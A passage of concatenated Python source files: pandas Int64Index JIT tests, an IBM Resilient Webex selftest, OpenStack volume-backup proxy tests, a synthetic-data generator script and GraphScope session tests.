test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_attribute_values(self): def test_impl(index): return index.values sdc_func = self.jit(test_impl) for data in _generate_valid_int64_index_data(): index = pd.Int64Index(data) with self.subTest(index_data=data): result = sdc_func(index) result_ref = test_impl(index) np.testing.assert_array_equal(result, result_ref) def test_int64_index_contains(self): def test_impl(index, value): return value in index sdc_func = self.jit(test_impl) index = pd.Int64Index([1, 11, 2]) values_to_test = [-5, 15, 1, 11, 5, 6] for value in values_to_test: with self.subTest(value=value): result = sdc_func(index, value) result_ref = test_impl(index, value) np.testing.assert_array_equal(result, result_ref) def test_int64_index_copy(self): def test_impl(index, new_name): return index.copy(name=new_name) sdc_func = self.jit(test_impl) for data in _generate_valid_int64_index_data(): for name, new_name in product(test_global_index_names, repeat=2): index = pd.Int64Index(data, name=name) with self.subTest(index=index, new_name=new_name): result = sdc_func(index, new_name) result_ref = test_impl(index, new_name) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_copy_param_deep(self): def test_impl(index, deep): return index.copy(deep=deep) sdc_func = self.jit(test_impl) index = pd.Int64Index([1, 11, 2]) for deep in [True, False]: with self.subTest(deep=deep): result = sdc_func(index, deep) result_ref = test_impl(index, deep) pd.testing.assert_index_equal(result, result_ref) self.assertEqual( result._data is index._data, result_ref._data is index._data ) def test_int64_index_getitem_scalar(self): def test_impl(index, idx): return index[idx] sdc_func = self.jit(test_impl) for data in _generate_valid_int64_index_data(): index = pd.Int64Index(data) n = len(index) values_to_test = [-n, n // 2, n - 1] for idx in values_to_test: with self.subTest(index=index, idx=idx): result = sdc_func(index, idx) result_ref = test_impl(index, idx) self.assertEqual(result, result_ref) def test_int64_index_getitem_scalar_idx_bounds(self): def test_impl(index, idx): return index[idx] sdc_func = self.jit(test_impl) n = 11 index = pd.Int64Index(np.arange(n) * 2, name='abc') values_to_test = [-(n + 1), n] for idx in values_to_test: with self.subTest(idx=idx): with self.assertRaises(Exception) as context: test_impl(index, idx) pandas_exception = context.exception with self.assertRaises(type(pandas_exception)) as context: sdc_func(index, idx) sdc_exception = context.exception self.assertIsInstance(sdc_exception, type(pandas_exception)) self.assertIn("out of bounds", str(sdc_exception)) def test_int64_index_getitem_slice(self): def test_impl(index, idx): return index[idx] sdc_func = self.jit(test_impl) n = 17 slices_params = combinations_with_replacement( [None, 0, -1, n // 2, n, n - 3, n + 3, -(n + 3)], 2 ) for data in _generate_valid_int64_index_data(): index = pd.Int64Index(data, name='abc') for slice_start, slice_stop in slices_params: for slice_step in [1, -1, 2]: idx = slice(slice_start, slice_stop, slice_step) with self.subTest(index=index, idx=idx): result = sdc_func(index, idx) result_ref = test_impl(index, idx) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_iterator_1(self): def test_impl(index): res = [] for i, label in enumerate(index): res.append((i, label)) return res sdc_func = self.jit(test_impl) index = pd.Int64Index([5, 3, 2, 1, 7, 4]) result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_iterator_2(self): def test_impl(index): res = [] for label in index: if not label % 2: res.append(label) return res sdc_func = self.jit(test_impl) index = pd.Int64Index([5, 3, 2, 1, 7, 4]) result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_nparray(self): def test_impl(index): return np.array(index) sdc_func = self.jit(test_impl) n = 11 index = get_sample_index(n, Int64IndexType) result = sdc_func(index) result_ref = test_impl(index) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_eq_index(self): def test_impl(index1, index2): return index1 == index2 sdc_func = self.jit(test_impl) n = 11 for index1, index2 in product(_generate_int64_indexes_fixed(n), repeat=2): with self.subTest(index1=index1, index2=index2): result = np.asarray(sdc_func(index1, index2)) # FIXME_Numba#5157: remove np.asarray result_ref = test_impl(index1, index2) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_eq_scalar(self): def test_impl(A, B): return A == B sdc_func = self.jit(test_impl) n = 11 A = pd.Int64Index(np.arange(n) * 2) scalars_to_test = [0, 22, 13, -5, 4.0] for B in scalars_to_test: for swap_operands in (False, True): if swap_operands: A, B = B, A with self.subTest(left=A, right=B): result = np.asarray(sdc_func(A, B)) # FIXME_Numba#5157: remove np.asarray result_ref = test_impl(A, B) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_eq_nparray(self): def test_impl(A, B): return A == B sdc_func = self.jit(test_impl) n = 11 for A, B in product( _generate_int64_indexes_fixed(n), map(lambda x: np.array(x), _generate_int64_indexes_fixed(n)) ): for swap_operands in (False, True): if swap_operands: A, B = B, A with self.subTest(left=A, right=B): result = np.asarray(sdc_func(A, B)) # FIXME_Numba#5157: remove np.asarray result_ref = test_impl(A, B) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_ne_index(self): def test_impl(index1, index2): return index1 != index2 sdc_func = self.jit(test_impl) n = 11 for index1, index2 in product(_generate_int64_indexes_fixed(n), repeat=2): with self.subTest(index1=index1, index2=index2): result = np.asarray(sdc_func(index1, index2)) # FIXME_Numba#5157: remove np.asarray result_ref = test_impl(index1, index2) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_is_nounbox(self): # positive testcase def test_impl_1(data, name): index1 = pd.Int64Index(data, name=name) index2 = index1 return index1 is index2 # negative testcase def test_impl_2(data, name): index1 = pd.Int64Index(data, name=name) index2 = pd.Int64Index(data, name=name) return index1 is index2 index_data = pd.Int64Index([1, 2, 3, 5, 6, 3, 4]).values compiled_funcs = [ (test_impl_1, "same indexes"), (test_impl_2, "not same indexes") ] for pyfuncs, name in product(compiled_funcs, test_global_index_names): func, descr = pyfuncs sdc_func = self.jit(func) with self.subTest(subtest=f"{descr}, name={name}"): result = sdc_func(index_data, name) result_ref = func(index_data, name) expected = True if descr == "same indexes" else False self.assertEqual(result, result_ref) self.assertEqual(result, expected) def test_int64_index_getitem_by_mask(self): def test_impl(index, mask): return index[mask] sdc_func = self.jit(test_impl) n = 11 np.random.seed(0) mask = np.random.choice([True, False], n) for index in _generate_int64_indexes_fixed(n): result = sdc_func(index, mask) result_ref = test_impl(index, mask) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_getitem_by_array(self): def test_impl(index, idx): return index[idx] sdc_func = self.jit(test_impl) n, k = 11, 7 np.random.seed(0) idx = np.random.choice(np.arange(n), k) for index in _generate_int64_indexes_fixed(n): result = sdc_func(index, idx) result_ref = test_impl(index, idx) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_reindex_equal_indexes(self): def test_func(index1, index2): return index1.reindex(index2) sdc_func = self.jit(test_func) n = 10 np.random.seed(0) index1 = pd.Int64Index(np.arange(n)) index2 = pd.Int64Index(np.copy(index1.values)) result = sdc_func(index1, index2) result_ref = test_func(index1, index2) pd.testing.assert_index_equal(result[0], result_ref[0]) np.testing.assert_array_equal(result[1], result_ref[1]) def test_int64_index_reindex(self): def test_impl(index1, index2): return index1.reindex(index2) sdc_func = self.jit(test_impl) n = 10 np.random.seed(0) index_data = np.arange(n) index1 = pd.Int64Index(np.random.choice(index_data, n, replace=False)) reindex_by = [ pd.RangeIndex(n + 2), pd.RangeIndex(0, n, 2), pd.Int64Index(np.random.choice(index_data, n, replace=False)), pd.Int64Index(np.random.choice([0, 1, 11, 12, 100], n)) ] for index2 in reindex_by: with self.subTest(index2=index2): result = sdc_func(index1, index2) result_ref = test_impl(index1, index2) pd.testing.assert_index_equal(result[0], result_ref[0]) np.testing.assert_array_equal(result[1], result_ref[1]) def test_int64_index_equals(self): def test_impl(index1, index2): return index1.equals(index2) sdc_func = self.jit(test_impl) n = 11 indexes_to_test = [ pd.Int64Index(np.arange(n)), pd.Int64Index(np.arange(n), name='asd'), pd.Int64Index(np.arange(n) * 2, name='asd'), pd.Int64Index(np.arange(2 * n)), ] for index1, index2 in combinations_with_replacement(indexes_to_test, 2): with self.subTest(index1=index1, index2=index2): result = sdc_func(index1, index2) result_ref = test_impl(index1, index2) self.assertEqual(result, result_ref) def test_int64_index_ravel(self): def test_impl(index): return index.ravel() sdc_func = self.jit(test_impl) n = 11 index = pd.Int64Index(np.arange(n) * 2) result = sdc_func(index) result_ref = test_impl(index) np.testing.assert_array_equal(result, result_ref) def test_int64_index_take(self): def test_impl(index, value): return index.take(value) sdc_func = self.jit(test_impl) n = 11 np.random.seed(0) index_pos = np.arange(n) values_to_test = [ np.random.choice(index_pos, 2*n), list(np.random.choice(index_pos, n, replace=False)), pd.RangeIndex(n // 2), pd.Int64Index(index_pos[n // 2:]) ] for index, value in product(_generate_int64_indexes_fixed(n), values_to_test): with self.subTest(index=index, value=value): result = sdc_func(index, value) result_ref = test_impl(index, value) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_append(self): def test_impl(index, other): return index.append(other) sdc_func = self.jit(test_impl) n = 11 other_indexes = [ get_sample_index(n, PositionalIndexType), get_sample_index(n, RangeIndexType), get_sample_index(n, Int64IndexType), ] for index, other in product( _generate_int64_indexes_fixed(n), other_indexes): with self.subTest(index=index, other=other): result = sdc_func(index, other) result_ref = test_impl(index, other) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_join(self): def test_impl(index, other): return index.join(other, 'outer', return_indexers=True) sdc_func = self.jit(test_impl) n = 11 other_indexes = [ get_sample_index(2 * n, PositionalIndexType), get_sample_index(2 * n, RangeIndexType), get_sample_index(2 * n, Int64IndexType), ] for index, other in product( _generate_int64_indexes_fixed(n), other_indexes): with self.subTest(index=index, other=other): result = sdc_func(index, other) result_ref = test_impl(index, other) # check_names=False, since pandas behavior is not type-stable pd.testing.assert_index_equal(result[0], result_ref[0], check_names=False) np.testing.assert_array_equal(result[1], result_ref[1]) np.testing.assert_array_equal(result[2], result_ref[2]) if __name__ == "__main__": unittest.main()
python
# (c) Copyright IBM Corp. 2010, 2021. All Rights Reserved. # -*- coding: utf-8 -*- # pragma pylint: disable=unused-argument, no-self-use """Function implementation""" import datetime import logging from resilient_lib import validate_fields, RequestsCommon from fn_create_webex_meeting.lib.cisco_api import WebexAPI log = logging.getLogger(__name__) log.setLevel(logging.INFO) log.addHandler(logging.StreamHandler()) PACKAGE_NAME = "fn_create_webex_meeting" log = logging.getLogger(__name__) log.setLevel(logging.INFO) log.addHandler(logging.StreamHandler()) def selftest_function(opts): """ Placeholder for selftest function. An example use would be to test package api connectivity. Suggested return values are be unimplemented, success, or failure. """ options = opts.get(PACKAGE_NAME, {}) required_fields = ["webex_email", "webex_password", "webex_site_url", "webex_timezone"] validate_fields(required_fields, options) opts = dict() opts["rc"] = RequestsCommon(opts, options) opts["webex_site_url"] = options.get("webex_site_url") opts["email"] = options.get("webex_email") opts["password"] = options.get("webex_password") opts["sitename"] = options.get("webex_site") opts["timezone"] = options.get("webex_timezone") opts["meeting_password"] = "Selftest23#" opts["meeting_name"] = "SelfTest Meeting" opts["meeting_agenda"] = "Agenda" # compute meeting start/end time for 1 day in the future (in epoch) now = datetime.datetime.utcnow() meeting_start = now + datetime.timedelta(days=1) meeting_end = meeting_start + datetime.timedelta(minutes= 10) webex_meeting_start_time = int(meeting_start.timestamp()*1000) webex_meeting_end_time = int(meeting_end.timestamp()*1000) try: webex = WebexAPI(opts, webex_meeting_start_time, webex_meeting_end_time) response = webex.create_meeting() if response.get("status") == "SUCCESS": return {"state": "success", "reason": "success"} else: return {"state": "failure", "reason": response.get("fail_reason")} except Exception as err: return {"state": "failure", "reason": err}
python
# Copyright (C) 2016 Intel Corporation # # SPDX-License-Identifier: MIT from .pip import Pip class IDP201700(Pip): _python_path = '/miniconda3/envs/idp2017.0.0/bin/python'
python
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from openstack.tests.unit.test_proxy_base3 import BaseProxyTestCase from openstack.volume_backup.v2 import _proxy from openstack.volume_backup.v2 import backup as _backup from openstack.volume_backup.v2 import backup_policy as _backup_policy from openstack.volume_backup import volume_backup_service class TestVolumeBackupProxy(BaseProxyTestCase): def __init__(self, *args, **kwargs): super(TestVolumeBackupProxy, self).__init__( *args, proxy_class=_proxy.Proxy, service_class=volume_backup_service.VolumeBackupService, **kwargs) class TestCloudBackup(TestVolumeBackupProxy): def __init__(self, *args, **kwargs): super(TestCloudBackup, self).__init__(*args, **kwargs) def test_create_backup(self): self.mock_response_json_values({ "id": "70a599e0-31e7-49b7-b260-868f441e862b" }) data = { "name": "backup1", "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768", "description": "Backups_Demon" } job = self.proxy.create_backup(**data) expect_post_json = { "backup": { "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768", "name": "backup1", "description": "Backups_Demon" } } self.assert_session_post_with("/cloudbackups", json=expect_post_json) self.assertIsInstance(job, _backup.CloudBackup) self.assertEqual("70a599e0-31e7-49b7-b260-868f441e862b", job.job_id) def test_create_native_backup(self): self.mock_response_json_file_values( "create_native_backup_response.json") data = { "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768", "snapshot_id": "2bb856e1-b3d8-4432-a858-09e4ce939389", "name": "backup1", "description": "Backup_Demo" } backup = self.proxy.create_native_backup(**data) expect_post_json = { "backup": { "volume_id": "c68ae7fb-0aa5-4a97-ab01-ed02c5b7e768", "snapshot_id": "2bb856e1-b3d8-4432-a858-09e4ce939389", "name": "backup1", "description": "Backup_Demo" } } self.assert_session_post_with("/backups", json=expect_post_json) self.assertIsInstance(backup, _backup.Backup) self.assertEqual("54ba0e69-48a0-4a77-9cdf-a7979a7e2648", backup.id) self.assertEqual("backup1", backup.name) def test_delete_backup_with_id(self): self.proxy.delete_backup("some-backup-id") self.assert_session_delete("backups/some-backup-id") def test_delete_backup_with_instance(self): self.proxy.delete_backup(_backup.Backup(id="some-backup-id")) self.assert_session_delete("backups/some-backup-id") def test_restore_backup(self): self.mock_response_json_values({ "id": "70a599e0-31e7-49b7-b260-868f441e862b" }) job = self.proxy.restore_backup( "some-backup-id", "c96e4a94-927a-425c-8795-63f9964cfebd") expect_post_json = { "restore": { "volume_id": "c96e4a94-927a-425c-8795-63f9964cfebd" } } self.assert_session_post_with( "cloudbackups/some-backup-id/restore", json=expect_post_json) self.assertIsInstance(job, _backup.CloudBackup) self.assertEqual("70a599e0-31e7-49b7-b260-868f441e862b", job.job_id) def test_list_backup(self): query = { "name": "some-backup", "status": "available", "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10 } self.mock_response_json_file_values("list_backups.json") backups = list(self.proxy.backups(**query)) transferred_query = { "name": "some-backup", "status": "available", "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10 } self.assert_session_list_with("/backups", params=transferred_query) self.assertEqual(2, len(backups)) backup = backups[0] self.assertEqual("1d1139d8-8989-49d3-8aa1-83eb691e6db2", backup.id) self.assertIsNone(backup.name) def test_list_backup_detail(self): query = { "name": "some-backup", "status": "available", "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10 } self.mock_response_json_file_values("list_backup_details.json") backups = list(self.proxy.backups(details=True, **query)) transferred_query = { "name": "some-backup", "status": "available", "volume_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10 } self.assert_session_list_with("/backups/detail", params=transferred_query) self.assertEqual(3, len(backups)) backup = backups[0] self.assertIsInstance(backup, _backup.BackupDetail) self.assertEqual("error", backup.status) self.assertIsNone(backup.description) self.assertIsNone(backup.availability_zone) self.assertEqual("2748f2f2-4394-4e6e-af8d-8dd34496c024", backup.volume_id) self.assertEqual(("Connection to swift failed: " "[Errno 111] ECONNREFUSED"), backup.fail_reason) self.assertEqual("1d1139d8-8989-49d3-8aa1-83eb691e6db2", backup.id) self.assertEqual(1, backup.size) self.assertIsNone(backup.object_count) self.assertEqual("volumebackups", backup.container) self.assertIsNone(backup.name) self.assertEqual("2013-06-27T08:48:03.000000", backup.created_at) self.assertEqual("b23b579f08c84228b9b4673c46f0c442", backup.tenant_id) def test_get_backup(self): self.mock_response_json_file_values("get_backup.json") backup = self.proxy.get_backup("backup-id") self.session.get.assert_called_once_with( "backups/backup-id", endpoint_filter=self.service, endpoint_override=self.service.get_endpoint_override(), ) self.assertIsInstance(backup, _backup.Backup) self.assertEqual("error", backup.status) self.assertIsNone(backup.description) self.assertIsNone(backup.availability_zone) self.assertEqual("2748f2f2-4394-4e6e-af8d-8dd34496c024", backup.volume_id) self.assertEqual(("Connection to swift failed: " "[Errno 111] ECONNREFUSED"), backup.fail_reason) self.assertEqual("1d1139d8-8989-49d3-8aa1-83eb691e6db2", backup.id) self.assertEqual(1, backup.size) self.assertIsNone(backup.object_count) self.assertEqual("volumebackups", backup.container) self.assertIsNone(backup.name) self.assertEqual("2013-06-27T08:48:03.000000", backup.created_at) self.assertEqual("b23b579f08c84228b9b4673c46f0c442", backup.tenant_id) class TestBackupPolicy(TestVolumeBackupProxy): def __init__(self, *args, **kwargs): super(TestBackupPolicy, self).__init__(*args, **kwargs) def test_list_backup_policy(self): self.mock_response_json_file_values("list_backup_policies.json") policies = list(self.proxy.backup_policies()) self.assert_session_list_with("/backuppolicy", params={}) self.assertEqual(2, len(policies)) policy = policies[0] self.assertIsInstance(policy, _backup_policy.BackupPolicy) self.assertEqual("XX", policy.id) self.assertEqual("plan01", policy.name) self.assertEqual(0, policy.policy_resource_count) scheduled_policy = policy.scheduled_policy self.assertIsInstance(scheduled_policy, _backup_policy.SchedulePolicy) self.assertEqual(False, scheduled_policy.remain_first_backup_of_curMonth) self.assertEqual(10, scheduled_policy.rentention_num) self.assertEqual(1, scheduled_policy.frequency) self.assertEqual("12:00", scheduled_policy.start_time) self.assertEqual("ON", scheduled_policy.status) self.assertTrue(policies[1].scheduled_policy .remain_first_backup_of_curMonth) def test_create_backup_policy(self): self.mock_response_json_values({ "backup_policy_id": "af8a20b0-117d-4fc3-ae53-aa3968a4f870" }) scheduled_policy = { "remain_first_backup_of_curMonth": True, "rentention_num": 10, "frequency": 1, "start_time": "12:00", "status": "ON" } policy = self.proxy.create_backup_policy("backup_policy_name", **scheduled_policy) expect_post_json = { "backup_policy_name": "backup_policy_name", "scheduled_policy": { "remain_first_backup_of_curMonth": "Y", "rentention_num": 10, "frequency": 1, "start_time": "12:00", "status": "ON" } } self.assert_session_post_with("/backuppolicy", json=expect_post_json) self.assertEqual("af8a20b0-117d-4fc3-ae53-aa3968a4f870", policy.id) def test_update_backup_policy(self): self.mock_response_json_values({ "backup_policy_id": "af8a20b0-117d-4fc3-ae53-aa3968a4f870" }) attrs = self.get_file_content("update_policy.json") self.proxy.update_backup_policy("some-policy-id", **attrs) expected_json = { "backup_policy_name": "policy_01", "scheduled_policy": { "remain_first_backup_of_curMonth": "Y", "rentention_num": 10, "frequency": 1, "start_time": "12:00", "status": "ON" } } self.assert_session_put_with("backuppolicy/some-policy-id", json=expected_json) def test_delete_backup_policy_with_id(self): self.proxy.delete_backup_policy("some-config-id") self.assert_session_delete("backuppolicy/some-config-id") def test_link_resource_to_policy(self): self.mock_response_json_file_values("link_resources.json") policy = _backup_policy.BackupPolicy(id="policy-id") resources = ["volume-id-1", "volume-id-2"] linked_resources = self.proxy.link_resources_to_policy(policy, resources) self.assert_session_post_with("/backuppolicyresources", json={ "backup_policy_id": "policy-id", "resources": [{ "resource_id": "volume-id-1", "resource_type": "volume" }, { "resource_id": "volume-id-2", "resource_type": "volume" }] }) self.assertEqual(2, len(linked_resources)) success = linked_resources[0] self.assertEqual("bce8d47a-af17-4169-901f-4c7ae9f29c2c", success.resource_id) self.assertEqual("pod01.eu-de-01sa-brazil-1cn-north-1", success.os_vol_host_attr) self.assertEqual("eu-de-01sa-brazil-1cn-north-1", success.availability_zone) self.assertEqual("volume", success.resource_type) self.assertTrue(success.success) success = linked_resources[1] self.assertEqual("volume-id-2", success.resource_id) self.assertEqual("pod01.eu-de-01sa-brazil-1cn-north-1", success.os_vol_host_attr) self.assertEqual("eu-de-01sa-brazil-1cn-north-1", success.availability_zone) self.assertEqual("volume", success.resource_type) self.assertEqual("VBS.0002", success.code) self.assertEqual("xxxxx", success.message) self.assertFalse(success.success) def test_unlink_resource_of_policy(self): self.mock_response_json_file_values("unlink_resources.json") policy = _backup_policy.BackupPolicy(id="policy-id") resources = ["volume-id-1", "volume-id-2"] linked_resources = self.proxy.unlink_resources_of_policy(policy, resources) self.assert_session_post_with( "backuppolicyresources/policy-id/deleted_resources", json={ "resources": [{ "resource_id": "volume-id-1" }, { "resource_id": "volume-id-2" }] }) self.assertEqual(2, len(linked_resources)) success = linked_resources[0] self.assertEqual("bce8d47a-af17-4169-901f-4c7ae9f29c2c", success.resource_id) self.assertTrue(success.success) success = linked_resources[1] self.assertEqual("volume-id-2", success.resource_id) self.assertEqual("VBS.0002", success.code) self.assertEqual("xxxxx", success.message) self.assertFalse(success.success) def test_execute_policy(self): policy = _backup_policy.BackupPolicy(id="policy-id") self.proxy.execute_policy(policy) self.assert_session_post_with("backuppolicy/policy-id/action", json=None) def test_enable_policy(self): self.mock_response_json_file_values("update_policy.json") policy = _backup_policy.BackupPolicy(id="policy-id") self.proxy.enable_policy(policy) self.assert_session_put_with("backuppolicy/policy-id", json={ "scheduled_policy": { "status": "ON" } }) def test_disable_policy(self): self.mock_response_json_file_values("update_policy.json") policy = _backup_policy.BackupPolicy(id="policy-id") self.proxy.disable_policy(policy) self.assert_session_put_with("backuppolicy/policy-id", json={ "scheduled_policy": { "status": "OFF" } }) def test_list_task(self): query = { "sort_dir": "asc", "sort_key": "created_at", "status": "RUNNING", "id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10, "offset": 10 } self.mock_response_json_file_values("list_tasks.json") tasks = list(self.proxy.tasks("policy-id", **query)) transferred_query = { "sort_dir": "asc", "sort_key": "created_at", "status": "RUNNING", "job_id": "0781095c-b8ab-4ce5-99f3-4c5f6ff75319", "limit": 10, "offset": 10 } self.assert_session_list_with("/backuppolicy/policy-id/backuptasks", params=transferred_query) self.assertEqual(2, len(tasks)) task = tasks[0] self.assertEqual("RUNNING", task.status) self.assertEqual("0781095c-b8ab-4ce5-99f3-4c5f6ff75319", task.id) self.assertEqual("2016-12-03T06:24:34.467", task.created_at) self.assertEqual("autobk_a61d", task.backup_name) self.assertEqual("f47a4ab5-11f5-4509-97f5-80ce0dd74e37", task.resource_id) self.assertEqual("volume", task.resource_type)
python
import numpy as np from sklearn.datasets import make_regression from scipy.stats import norm, itemfreq import pandas as pd import matplotlib.pyplot as plt import sys import argparse parser = argparse.ArgumentParser() parser.add_argument( 'RowCount', type=int, help='The number of rows to generate' ) parser.add_argument( '--show-graph', help='Show a graph of the results, -x and -y must be given', action='store_true' ) parser.add_argument( '-x', help='The x-axis of the graph', type=str, choices=['Age', 'Income', 'Height', 'Github_stars'] ) parser.add_argument( '-y', help='The y-axis of the graph', type=str, choices=['Age', 'Income', 'Height', 'Github_stars'] ) parser.add_argument( '-f', '--file', help='Save the data to a file', type=str ) args = parser.parse_args() def pick_profession(age, income, github_stars, height): if age > 50 and income > 20000: return 'president' if height > 190 and income > 5000: return 'basketball player' if github_stars > 30: if income > 20000: return 'software architect' else: return 'programmer' if age % 2 == 0 and github_stars % 3 == 1: return 'reality tv star' if age < 20: return 'student' if income < 1000: if height > 180: return 'soldier' return 'unemployed' if income < 5000 and height > 180: return 'officer' if height > 180: return 'general' return 'car salesman' row_count = args.RowCount age, income = make_regression(row_count, 1, 1, noise=3.3, random_state=42) age = age.reshape((row_count,)) age = np.log(age * age + 1) * 17 + 20 age = np.floor(age) income = income * income * 6 + 500 github_stars = -0.169 * age * age + 10 * age + income / 750 - 130 github_stars = np.floor(github_stars) height = norm.rvs(size=row_count, loc=180, scale=10, random_state=42) xs = -github_stars * height / 10 + age**2 / 2 is_client = (norm.rvs(size=row_count, loc=-100, scale=100) + xs) > 0 profession = [ pick_profession(age[i], income[i], github_stars[i], height[i]) for i in range(0, row_count) ] df = pd.DataFrame( { 'Age': age, 'Income': income, 'Github_stars': github_stars, 'Height': height, 'Profession': profession, 'Is_client': is_client, } ) print('Max age {0}, min age: {1}'.format(age.max(), age.min())) print('Max income {0}, min income: {1}'.format(income.max(), income.min())) print('Max stars {0}, min stars: {1}'.format(github_stars.max(), github_stars.min())) print('Max height {0}, min height: {1}'.format(height.max(), height.min())) print('Profession counts') print(df.Profession.value_counts()) print('Client counts') print(df.Is_client.value_counts()) print(df[0:20]) if args.show_graph: plt.plot(df[args.x], df[args.y], 'o') plt.show() if args.file is not None: df.to_csv(args.file)
python
""" >>> def fn(arg1,arg2): pass >>> co = fn.func_code >>> co.co_argcount 2 >>> co.co_varnames ('arg1', 'arg2') """ def _test(): import doctest doctest.testmod() if __name__ == "__main__": _test()
python
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import json import os import tempfile import pytest import graphscope COORDINATOR_HOME = os.path.join(os.path.dirname(__file__), "../", "../coordinator") new_data_dir = os.path.expandvars("${GS_TEST_DIR}/new_property/v2_e2") def setUpModule(): graphscope.set_option(show_log=True) graphscope.set_option(initializing_interactive_engine=False) @pytest.fixture def invalid_config_file(): with tempfile.TemporaryDirectory() as dir_name: json_path = os.path.join(dir_name, "test.json") with open(json_path, "w") as f: # json format is incorrect. f.write('{"xxx": ["xxx"],"xxx": 9527 "num_workers": 4}') yield json_path @pytest.fixture def local_config_file(): conf = {"num_workers": 4} with tempfile.TemporaryDirectory() as dir_name: json_path = os.path.join(dir_name, "test.json") with open(json_path, "w") as f: json.dump(conf, f) yield json_path # load property graph to specified session def load_graph(session): g = session.load_from( edges={ "e0": [ ( "{}/twitter_e_0_0_0#header_row=true".format(new_data_dir), ["weight"], ("src", "v0"), ("dst", "v0"), ), ( "{}/twitter_e_0_1_0#header_row=true".format(new_data_dir), ["weight"], ("src", "v0"), ("dst", "v1"), ), ( "{}/twitter_e_1_0_0#header_row=true".format(new_data_dir), ["weight"], ("src", "v1"), ("dst", "v0"), ), ( "{}/twitter_e_1_1_0#header_row=true".format(new_data_dir), ["weight"], ("src", "v1"), ("dst", "v1"), ), ], "e1": [ ( "{}/twitter_e_0_0_1#header_row=true".format(new_data_dir), ["weight"], ("src", "v0"), ("dst", "v0"), ), ( "{}/twitter_e_0_1_1#header_row=true".format(new_data_dir), ["weight"], ("src", "v0"), ("dst", "v1"), ), ( "{}/twitter_e_1_0_1#header_row=true".format(new_data_dir), ["weight"], ("src", "v1"), ("dst", "v0"), ), ( "{}/twitter_e_1_1_1#header_row=true".format(new_data_dir), ["weight"], ("src", "v1"), ("dst", "v1"), ), ], }, vertices={ "v0": "{}/twitter_v_0#header_row=true".format(new_data_dir), "v1": "{}/twitter_v_1#header_row=true".format(new_data_dir), }, generate_eid=False, ) return g def test_default_session(): default_sess = graphscope.get_default_session() assert default_sess.info["status"] == "active" default_sess.close() assert default_sess.info["status"] == "closed" def test_launch_cluster_on_local(local_config_file): s = graphscope.session(cluster_type="hosts", config=local_config_file) info = s.info assert info["status"] == "active" s.close() @pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI") def test_launch_session_from_config(local_config_file): saved = os.environ.get("GS_CONFIG_PATH", "") try: os.environ["GS_CONFIG_PATH"] = local_config_file s = graphscope.session(cluster_type="hosts") info = s.info assert info["status"] == "active" s.close() finally: os.environ["GS_CONFIG_PATH"] = saved @pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI") def test_launch_session_from_dict(): conf_dict = {"num_workers": 4} s = graphscope.session(cluster_type="hosts", config=conf_dict) info = s.info assert info["status"] == "active" s.close() @pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI") def test_config_dict_has_highest_priority(local_config_file): s = graphscope.session( cluster_type="hosts", config=local_config_file, num_workers=2 ) info = s.info assert info["status"] == "active" s.close() def test_error_on_config_file_not_exist(): with pytest.raises(FileNotFoundError, match="No such file or directory"): graphscope.session(cluster_type="hosts", config="~/non_existing_filename.txt") def test_error_on_invalid_config_file(invalid_config_file): # invalid config file (example json format incorrect) with pytest.raises(json.decoder.JSONDecodeError): graphscope.session(cluster_type="hosts", config=invalid_config_file) def test_correct_closing_on_hosts(): s1 = graphscope.session(cluster_type="hosts") s1.close() # check, launched coordinator and graphscope-engines on local are correctly closed. # test close twice s1.close() @pytest.mark.skipif("FULL-TEST-SUITE" not in os.environ, reason="Run in nightly CI") def test_border_cases(): s1 = graphscope.session(cluster_type="hosts") s2 = graphscope.session(cluster_type="hosts") s3 = graphscope.session(cluster_type="hosts") s1.as_default() assert graphscope.get_default_session() == s1 g3 = load_graph(s3) with pytest.raises( ValueError, match="A default session is already active. You must explicitly call Session.close().", ): s2.as_default() s1.close() s2.as_default() assert graphscope.get_default_session() == s2 s2.close() s3.as_default() assert graphscope.get_default_session() == s3 sssp = graphscope.property_sssp(g3, src=4) # ok, g3 belong to s3 s3.close() def test_with(): with graphscope.session(cluster_type="hosts") as sess: assert graphscope.get_default_session() == sess sess = graphscope.session(cluster_type="hosts") with sess: pass assert sess.info["status"] == "closed"
python
